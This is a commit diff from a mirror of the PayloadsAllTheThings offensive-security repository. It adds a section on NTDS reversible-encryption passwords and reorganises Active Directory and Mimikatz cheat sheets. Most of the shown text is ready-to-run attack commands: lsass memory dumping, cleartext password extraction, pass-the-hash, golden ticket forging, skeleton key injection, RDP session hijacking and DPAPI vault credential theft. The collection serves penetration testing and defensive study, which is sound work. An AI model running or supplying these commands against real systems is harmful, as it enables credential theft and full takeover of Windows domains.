mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
NTDS Reversible Encryption
This commit is contained in:
parent
4ca065f8ed
commit
5966c3a21b
@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||
|
||||
### JSON.NET
|
||||
|
||||
* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
|
||||
* Payload output: **JSON**
|
||||
|
||||
```ps1
|
||||
|
@ -40,6 +40,7 @@
|
||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
||||
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
||||
- [User Hunting](#user-hunting)
|
||||
- [Password spraying](#password-spraying)
|
||||
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
|
||||
@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
|
||||
|
||||
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
||||
|
||||
```powershell
|
||||
# remote
|
||||
rpcclient $> lookupnames john.smith
|
||||
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
||||
|
||||
# loc
|
||||
wmic useraccount get name,sid
|
||||
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
||||
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
||||
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
||||
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
||||
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
||||
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
||||
|
||||
# powerview
|
||||
Convert-NameToSid high-sec-corp.localkrbtgt
|
||||
S-1-5-21-2941561648-383941485-1389968811-502
|
||||
```
|
||||
* RPCClient
|
||||
```powershell
|
||||
rpcclient $> lookupnames john.smith
|
||||
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
||||
```
|
||||
* WMI
|
||||
```powershell
|
||||
wmic useraccount get name,sid
|
||||
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
||||
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
||||
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
||||
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
||||
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
||||
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
||||
```
|
||||
* Powerview
|
||||
```powershell
|
||||
Convert-NameToSid high-sec-corp.localkrbtgt
|
||||
S-1-5-21-2941561648-383941485-1389968811-502
|
||||
```
|
||||
* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`
|
||||
|
||||
```bash
|
||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||
@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
|
||||
- [crackstation.net](https://crackstation.net)
|
||||
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
||||
|
||||
|
||||
#### NTDS Reversible Encryption
|
||||
|
||||
`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
|
||||
|
||||
The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
|
||||
This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
|
||||
|
||||
* List users with "Store passwords using reversible encryption" enabled
|
||||
```powershell
|
||||
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
|
||||
```
|
||||
|
||||
The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT.
|
||||
|
||||
|
||||
### User Hunting
|
||||
|
||||
Sometimes you need to find a machine where a specific user is logged in.
|
||||
|
@ -2,25 +2,25 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Mimikatz - Execute commands](#mimikatz---execute-commands)
|
||||
* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
|
||||
* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
|
||||
* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
|
||||
* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
|
||||
* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
|
||||
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
||||
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||
* [Execute commands](#execute-commands)
|
||||
* [Extract passwords](#extract-passwords)
|
||||
* [LSA Protection Workaround](#lsa-protection-workaround)
|
||||
* [Mini Dump](#mini-dump)
|
||||
* [Pass The Hash](#pass-the-hash)
|
||||
* [Golden ticket](#golden-ticket)
|
||||
* [Skeleton key](#skeleton-key)
|
||||
* [RDP session takeover](#rdp-session-takeover)
|
||||
* [Credential Manager & DPAPI](#credential-manager--dpapi)
|
||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||
* [Vault](#vault)
|
||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||
* [Commands list](#commands-list)
|
||||
* [Powershell version](#powershell-version)
|
||||
* [References](#references)
|
||||
|
||||
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
||||
|
||||
## Mimikatz - Execute commands
|
||||
## Execute commands
|
||||
|
||||
Only one command
|
||||
|
||||
@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords
|
||||
mimikatz # sekurlsa::wdigest
|
||||
```
|
||||
|
||||
## Mimikatz - Extract passwords
|
||||
## Extract passwords
|
||||
|
||||
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||
|
||||
@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||
* Adding requires lock
|
||||
* Removing requires reboot
|
||||
|
||||
## Mimikatz - LSA Protection Workaround
|
||||
## LSA Protection Workaround
|
||||
|
||||
- LSA as a Protected Process (RunAsPPL)
|
||||
```powershell
|
||||
@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz - Mini Dump
|
||||
## Mini Dump
|
||||
|
||||
Dump the lsass process with `procdump`
|
||||
|
||||
@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
|
||||
```
|
||||
|
||||
|
||||
Use the minidump:
|
||||
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
|
||||
```powershell
|
||||
mimikatz # sekurlsa::minidump lsass.dmp
|
||||
mimikatz # sekurlsa::logonPasswords
|
||||
```
|
||||
* Pypykatz: `pypykatz lsa minidump lsass.dmp`
|
||||
|
||||
Then load it inside Mimikatz.
|
||||
|
||||
```powershell
|
||||
mimikatz # sekurlsa::minidump lsass.dmp
|
||||
Switch to minidump
|
||||
mimikatz # sekurlsa::logonPasswords
|
||||
```
|
||||
|
||||
## Mimikatz - Pass The Hash
|
||||
## Pass The Hash
|
||||
|
||||
```powershell
|
||||
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
|
||||
```
|
||||
|
||||
## Mimikatz - Golden ticket
|
||||
## Golden ticket
|
||||
|
||||
```powershell
|
||||
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
||||
@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15
|
||||
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
||||
```
|
||||
|
||||
## Mimikatz - Skeleton key
|
||||
## Skeleton key
|
||||
|
||||
```powershell
|
||||
privilege::debug
|
||||
@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
||||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||
```
|
||||
|
||||
## Mimikatz - RDP session takeover
|
||||
## RDP session takeover
|
||||
|
||||
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
||||
|
||||
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
|
||||
* Enable privileges
|
||||
```powershell
|
||||
privilege::debug
|
||||
token::elevate
|
||||
```
|
||||
* List RDP sessions
|
||||
```powershell
|
||||
ts::sessions
|
||||
```
|
||||
* Hijack session
|
||||
```powershell
|
||||
ts::remote /id:2
|
||||
```
|
||||
|
||||
```powershell
|
||||
privilege::debug
|
||||
token::elevate
|
||||
ts::remote /id:2
|
||||
```
|
||||
Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
|
||||
|
||||
```powershell
|
||||
# get the Session ID you want to hijack
|
||||
@ -188,7 +196,7 @@ net start sesshijack
|
||||
```
|
||||
|
||||
|
||||
## Mimikatz - Credential Manager & DPAPI
|
||||
## Credential Manager & DPAPI
|
||||
|
||||
```powershell
|
||||
# check the folder to find credentials
|
||||
@ -235,7 +243,7 @@ Attributes : 0
|
||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||
```
|
||||
|
||||
## Mimikatz - Commands list
|
||||
## Commands list
|
||||
|
||||
| Command |Definition|
|
||||
|:----------------:|:---------------|
|
||||
@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
||||
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
||||
|
||||
## Mimikatz - Powershell version
|
||||
## Powershell version
|
||||
|
||||
Mimikatz in memory (no binary on disk) with :
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user